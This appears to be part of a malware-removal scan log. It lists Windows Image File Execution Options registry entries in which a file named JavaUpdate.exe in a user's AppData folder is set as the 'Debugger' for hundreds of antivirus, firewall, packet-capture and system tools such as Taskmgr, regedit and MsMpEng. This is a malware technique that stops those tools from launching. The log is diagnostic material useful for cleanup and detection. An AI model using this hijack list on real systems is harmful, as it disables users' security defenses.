IFEO\CavUMAS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavUserUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavvl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavwp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas17.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdinstx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CEmRep.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cis.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CisTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamscan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmdagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmgrdian.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configuresav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CONSCTLX.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreFrameworkHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreServiceShell.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\csi-eui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CV.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\DCSUserProt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dlservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dltray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dragon_updater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dumpcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dvpapi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dwengine.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econceal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\editcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekern.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekrn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\emlproui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\EMLPROXY.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\endtaskpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\espwatch.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Ethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fameh32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filedeleter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall2004.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewallgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPAVServer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FProtTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclamwrap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsgk32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSHDLL64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fshoster32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSM32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSMA32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsorsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsrt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fssm32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fwsrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\gateway.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDKBFltExe32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDSC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GpChromeDatabasegInx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxkickoff_x64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\hpf_.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iface.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\InstLsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\invent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipatrol.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipcserver.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipctray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iptray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7AVScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7CrvSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7EmlPxy.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7FWSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7PSSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7RTScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7SysMon.Exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSecurity.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMngr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4gui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4ss.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\licwiz.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Lite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\LittleHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\livehelp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lookout.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamscheduler.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mcods.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCS-Uninstall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldCCC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldDS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldRTM.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mcvsescn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mergecap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpCmdRun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpfcm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpUXSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MSASCui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msconfig.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MsMpEng.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msseces.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWAGENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWASER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nanoav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nanosvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\navapsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nbrowser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netguard: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\netguardlite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\njeeves2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nnf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32krn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nprosec.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\NS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nseupdatesvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nstzerospywarelite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcod.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvoy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nwscmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\oasclnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\omnitray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OnAccessInstaller.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ONLINENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\opf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\opfsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OPSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\op_mon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\outpost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetizer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetyzer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcipprev.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctavsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcviper.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\persfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pfft.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pgaccount.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prevxcsi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prifw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ProcessHacker.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procexp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procguard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\protect.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSANHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSessionAgent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSvcHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\QUHLPSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rawshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\RDTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\regedit.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rtt_crc_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sab_wab.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sagui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SAPISSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASCore64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savadminservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcleanup.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcli.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savmain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savprogress.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBPIMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANNER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANWSCS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfmanager.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\schedulerdaemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scproxysrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ScSecSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconIA.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDFSSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdtrayapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDWelcome.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\siteadv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sndsrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Sniffer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsmcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsupd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SoftAct.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spfirewallsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sppfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spybotsd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SpyHunter3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywareterminatorshield.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywat~1.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sp_rsser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ssupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SSUpdate64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERAntiSpyware.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERDelete.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Taskmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tcpdump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\terminet.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\text2pcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\THGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tppfdmn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYICOS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYSSER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\trigger.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tscutynt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tzpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiSeAgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiUpdateTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWinMgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxtray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UnThreat.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\updclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UserAccountControlSettings.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\utsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uwcdsvr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Main.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Medic.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Proxy.ahn: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3SP.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Svc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Up.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VCATCH.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\vdtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIEWTCP.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIPREUI.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\virusutilities.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VSDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\WebCompanion.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\webwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Windump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
